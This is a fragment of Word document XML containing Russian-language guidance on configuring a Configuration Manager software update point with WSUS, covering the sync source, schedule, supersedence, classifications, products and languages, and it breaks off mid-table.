        <w:t>Можно настроить учетную запись для использования сервером сайта, когда он подключается к службе WSUS, работающей в точке обновления ПО. Если эта учетная запись не настроена, для подключения к WSUS Configuration Manager использует учетную запись компьютера сервера сайта. Учетную запись соединения с сервером WSUS можно настроить на странице Параметры учетной записи и прокси-сервера в мастере или на вкладке Параметры учетной записи и прокси-сервера в свойствах точки обновления программного обеспечения. Настроить эту учетную запись можно в разных местах мастера в зависимости от используемой версии Configuration Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Источник синхронизации. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Вышестоящий источник синхронизации для синхронизации обновлений ПО можно настроить на странице Источник синхронизациимастера или на вкладке Общие в окне «Свойства компонента точки обновления программного обеспечения». Задаваемые параметры источника синхронизации различаются в зависимости от сайта. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В таблице 2 приведены параметры, доступные во время настройки точки обновления ПО на сайте.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714C54" w:rsidRPr="00617AC0" w:rsidRDefault="00714C54" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="9553" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4735"/>
        <w:gridCol w:w="4818"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4735" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Сайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4818" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Доступные параметры источника синхронизации</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4735"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 Сайт центра администрирования</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>– Автономный первичный сайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4818"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 Синхронизация с веб-сайта Центра обновления Майкрософт</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>– Синхронизация из вышестоящего источника данных</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>– Не синхронизировать из Центра обновления Майкрософт или вышестоящего источника данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="00714C54">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4735"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 Дополнительные точки обновления ПО на сайте</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>– Дочерний первичный сайт</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>– Вторичный сайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4818"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 Синхронизация из вышестоящего источника данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В следующем списке представлены подробные сведения о каждом параметре, который можно использовать как источник синхронизации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Синхронизация из Центра обновления Майкрософт</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: используйте этот параметр, чтобы синхронизировать метаданные обновлений с Центром обновления Майкрософт. Сайт центра администрирования должен иметь доступ к Интернету, иначе синхронизация не будет работать. Этот параметр доступен только при настройке точки обновления программного обеспечения для сайта верхнего уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Если точку обновления ПО от Интернета отделяет брандмауэр, может потребоваться настроить его, разрешив подключения к портам HTTP и HTTPS, используемым для веб-сайта служб WSUS. Также с помощью брандмауэра можно ограничить доступ к определенным доменам. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Синхронизация из вышестоящего источника данных: используйте этот параметр, чтобы синхронизировать метаданные обновлений из восходящего источника синхронизации. Дочерние первичные сайты и вторичные сайты автоматически настраиваются на использование URL-адреса родительского сайта для этого параметра. Вы можете синхронизировать обновления программного обеспечения с существующего сервера WSUS. Укажите URL-адрес, например https://WSUSServer:8531, где 8531 – порт, используемый для подключения к серверу WSUS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не синхронизировать из Центра обновления Майкрософт или вышестоящего источника данных</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: используйте этот параметр, чтобы вручную синхронизировать обновления ПО, если точка обновления на сайте верхнего уровня отсоединена от Интернета. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Примечание. Если точку обновления ПО от Интернета отделяет брандмауэр, может потребоваться настроить его, разрешив подключения к портам HTTP и HTTPS, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">используемым для веб-сайта служб WSUS. Также с помощью брандмауэра можно ограничить доступ к определенным доменам. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Можно также определить, следует ли создавать события составления отчетов WSUS, на странице Источник синхронизациимастера или на вкладке Параметры синхронизации в окне «Свойства компонента точки обновления программного обеспечения». Configuration Manager не использует эти события, поэтому можно оставить значение, заданное по умолчанию: Не создавать отчеты WSUS о событиях.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Расписание синхронизации. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройте расписание синхронизации на странице Расписание синхронизации мастера или в свойствах компонента точки обновления программного обеспечения. Этот параметр настраивается только в точке обновления программного обеспечения на сайте верхнего уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При включении расписания вы можете задать простое или настраиваемое повторяющееся расписание синхронизации. При настройке простого расписания время запуска указывается с помощью локального времени компьютера, на котором выполняется консоль Configuration Manager , на момент создания расписания. При настройке времени запуска в настраиваемом расписании используется локальное время компьютера, на котором выполняется консоль Configuration Manager .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Запланируйте выполнение синхронизации обновлений ПО с периодичностью, подходящей для вашей среды. Одним из типичных сценариев является настройка расписания синхронизации обновлений таким образом, чтобы синхронизация запускалась через некоторое время после регулярного выпуска обновлений безопасности Майкрософт во второй вторник каждого месяца. Еще один типичный сценарий: ежедневная синхронизация обновлений ПО, если обновления используются для доставки определений Endpoint Protection и обновлений ядра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание. Если вы решили не включать синхронизацию обновлений по расписанию, можно синхронизировать обновления программного обеспечения вручную с узла Все обновления программного обеспечения или узла Группы обновлений программного обеспечения в рабочей области библиотеки программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Правила замены. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройте параметры замены на странице Правила замены мастера или на вкладке Правила замены в свойствах компонента точки обновления программного обеспечения. Правила замены можно указать только на сайте верхнего уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На этой странице вы можете указать, что срок действия заменяемых обновлений ПО истекает немедленно. При этом такие обновления уже не включаются в новые развертывания, а для существующих развертываний указывается, что они содержат одно или несколько обновлений с истекшим сроком действия. Или же можно указать период времени, после которого истечет срок действия заменяемых обновлений ПО, что позволит по-прежнему их развертывать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Страница Правила замены мастера доступна, только если вы настраиваете первую точку обновления ПО на сайте. Эта страница не отображается при установке дополнительных точек обновления ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Классификация. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройте параметры классификации на странице Классификации мастера или на вкладке Классификации в свойствах компонента точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Страница Классификации мастера доступна, только если вы настраиваете первую точку обновления ПО на сайте. Эта страница не отображается при установке дополнительных точек обновления ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> При первой установке точки обновления ПО на сайте верхнего уровня очистите все классификации обновлений ПО. После первоначальной синхронизации обновлений настройте классификации из обновленного списка, а затем повторите синхронизацию. Этот параметр настраивается только в точке обновления программного обеспечения на сайте верхнего уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Продукты. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройте параметры продукта на странице Продукты мастера или на вкладке Продукты в свойствах компонента точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Страница Продукты мастера доступна, только если вы настраиваете первую точку обновления ПО на сайте. Эта страница не отображается при установке дополнительных точек обновления ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет. При первой установке точки обновления ПО на сайте верхнего уровня очистите все продукты. После первоначальной синхронизации обновлений настройте продукты из обновленного списка, а затем повторите синхронизацию. Этот параметр настраивается только в точке обновления программного обеспечения на сайте верхнего уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Языки. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройте языковые параметры на странице Языки мастера или на вкладке Языки в свойствах компонента точки обновления программного обеспечения. Укажите языки, для которых требуется синхронизировать файлы обновления ПО и сводные данные. Параметр Файл обновления программного обеспечения настраивается в каждой точке обновления программного обеспечения в иерархии Configuration Manager . Параметры Сводные данные настраиваются только в точке обновления ПО верхнего уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Страница Языки мастера доступна, только если вы устанавливаете точку обновления ПО на сайте центра администрирования. Языки файлов обновления программного обеспечения можно настроить на дочерних сайтах на вкладке Языки в свойствах компонента точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 2. Синхронизация обновлений программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Синхронизация обновлений программного обеспечения в Configuration Manager представляет собой процесс получения метаданных обновлений программного обеспечения, которые соответствуют критериям, заданным на сайте верхнего уровня. Точка обновления ПО на сайте верхнего уровня извлекает метаданные с веб-сайта Центра обновления Майкрософт или существующего сервера WSUS по расписанию. Или же вы можете запустить синхронизацию вручную в консоли Configuration Manager . Для успешного завершения синхронизации точка обновления программного обеспечения должна иметь доступ к вышестоящему источнику обновления. Если точка обновления программного обеспечения отсоединена от вышестоящего источника синхронизации, необходимо воспользоваться средством WSUSUtil для экспорта метаданных обновлений программного обеспечения из источника обновлений программного обеспечения и их импорта в отсоединенную точку обновления программного обеспечения. В следующей таблице перечислены типы точек обновления программного обеспечения и вышестоящий источник синхронизации, к которому точке обновления программного обеспечения требуется доступ. (табл. 3)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4219"/>
        <w:gridCol w:w="5069"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidTr="006B21A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4219" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Точка обновления программного обеспечения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
